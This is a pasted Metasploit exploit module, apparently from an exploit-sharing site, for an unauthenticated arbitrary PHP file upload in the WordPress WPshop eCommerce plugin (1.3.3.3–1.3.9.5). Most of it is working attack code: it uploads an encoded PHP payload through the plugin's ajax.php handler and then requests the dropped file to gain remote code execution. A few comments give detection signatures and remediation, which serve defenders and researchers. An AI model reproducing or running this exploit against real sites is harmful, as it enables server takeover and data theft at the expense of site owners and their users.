
exploit

a guest
Apr 27th, 2015
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit module for the arbitrary file upload in the WordPress WPshop
# eCommerce plugin (WPVDB 7830), affecting 1.3.3.3 through 1.3.9.5 according
# to the module description below.
#
# What the traffic looks like, for anyone reviewing logs or writing a rule:
#   * a multipart POST to <plugins>/wpshop/includes/ajax.php carrying the form
#     field elementCode=ajaxUpload and a file part named wpshop_file whose
#     filename ends in .php; the module sends no cookie or credentials;
#   * a follow-up request for the same file name under wp-content/uploads/.
#
# Remediation visible from this file: #check treats 1.3.9.6 as the first
# unaffected release. Independently of the plugin version, a web server that
# refuses to execute PHP from the uploads directory stops the second step.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  # Registers the module metadata (name, references, platform, single target)
  # with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
      'Description' => %q{
        This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
        from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
        code execution. This module has been tested successfully on WordPress WPshop eCommerce
        1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
      },
      'Author' => [
        'g0blin', # Vulnerability Discovery, initial msf module
        'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['WPVDB', '7830'],
        ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
      ],
      'Privileged' => false,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['WPshop eCommerce 1.3.9.5', {}]],
      'DisclosureDate' => 'Mar 09 2015',
      'DefaultTarget' => 0
    )

    super(module_info)
  end

  # Version check based on the plugin's readme: 1.3.9.6 is passed as the fixed
  # version and 1.3.3.3 as the version that introduced the flaw.
  #
  # @return the check code produced by check_plugin_version_from_readme
  def check
    check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
  end

  # Uploads the encoded payload through the plugin's ajax.php handler, registers
  # the dropped file for cleanup, then requests it from wp-content/uploads.
  #
  # Aborts via fail_with when the server does not answer or when the reply is
  # not a 200 whose body contains the uploaded file name.
  def exploit
    # Random 5-9 letter file name with a .php extension.
    dropped_name = "#{rand_text_alpha(5 + rand(5))}.php"

    form = Rex::MIME::Message.new
    form.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
    form.add_part(
      payload.encoded,
      'application/octet-stream',
      nil,
      "form-data; name=\"wpshop_file\"; filename=\"#{dropped_name}\""
    )
    body = form.to_s

    upload_uri = normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php')
    res = send_request_cgi(
      'uri' => upload_uri,
      'method' => 'POST',
      'ctype' => "multipart/form-data; boundary=#{form.bound}",
      'data' => body
    )

    # NOTE(review): the file name is interpolated into the pattern unescaped, so
    # the '.' before "php" matches any character.
    upload_confirmed = res && res.code == 200 && res.body =~ /#{dropped_name}/

    if upload_confirmed
      print_good("#{peer} - Payload uploaded as #{dropped_name}")
      register_files_for_cleanup(dropped_name)
    elsif res
      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
    else
      fail_with(Failure::Unknown, "#{peer} - Server did not answer")
    end

    print_status("#{peer} - Calling payload...")
    # Second argument is the request timeout in seconds; the response is not inspected.
    trigger_opts = { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', dropped_name) }
    send_request_cgi(trigger_opts, 5)
  end
end

# 1337day.com [2015-04-27] #